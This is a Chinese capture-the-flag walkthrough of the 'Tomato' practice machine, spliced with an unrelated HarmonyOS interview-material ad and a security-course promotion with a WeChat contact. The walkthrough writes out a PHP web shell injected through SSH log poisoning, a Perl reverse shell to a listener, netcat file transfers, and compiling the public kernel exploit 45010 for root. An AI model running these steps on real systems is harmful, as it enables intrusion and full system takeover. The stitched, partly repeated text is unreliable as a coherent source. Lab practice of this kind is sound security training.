靶机实战系列之Tomato靶机，2024年最新网易严选HarmonyOS鸿蒙开发三面面经

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数HarmonyOS鸿蒙开发工程师，想要提升技能，往往是自己摸索成长或者是报班学习，但对于培训机构动则几千的学费，着实压力不小。自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年HarmonyOS鸿蒙开发全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友，同时减轻大家的负担。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上HarmonyOS鸿蒙开发知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注鸿蒙获取）

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

远程文件包含功能通过info.php发现已经关闭

1.5 写入日志

view-source:http://192.168.112.134/antibot_image/antibots/info.php?image=/var/log/auth.log

发现存在ubuntu系统默认写入身份认证文件路径

/var/log/auth.log

尝试登录 ssh操作后会写入身份认证日志文件

ssh aaaaaaaaaaaaaaaaa@192.168.112.134   -p  2211

同样的在日志文件中确实发现了存在相关记录

写入一句话木马

ssh '<?php echo system($_GET["cmd"]); ?>'@192.168.112.134   -p  2211

并没有一句话木马，脚本已经被加载

view-source:http://192.168.112.134/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=id

写入成功！

1.6 反弹shell

view-source:http://192.168.112.134/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=which%20perl

直接反弹shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.112.128:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

1.7 内核漏洞枚举

sudo  apt  search   linux-exploit``linux-exploit-suggester``ls  /usr/share/linux-exploit-suggester``cp  /usr/share/linux-exploit-suggester/linux-exploit-suggester.sh .

linux-exploit-suggester可以用来枚举内核漏洞

利用nc传文件

mv   linux-exploit-suggester.sh   les.sh``nc  192.168.112.134  4444  < les.sh  -w 1``nc  -nvlp 4444 > les.sh` `chmod +x  les.sh``./les.sh

传输成功

利用此漏洞成功

发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机

searchsploit 45010``cp  /usr/share/exploitdb/exploits/linux/local/45010.c .``gcc  45010.c -o  exp``nc -lvnp 4444 > exp``nc 192.168.112.134  4444  < exp``chmod +x exp``./exp

成功！！！

注：如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"

点击上方公众号

关注我们

往期精彩

Armitage|MSF图形界面神器

原创|Searchall3.5.8敏感信息搜索工具

`黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

---

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。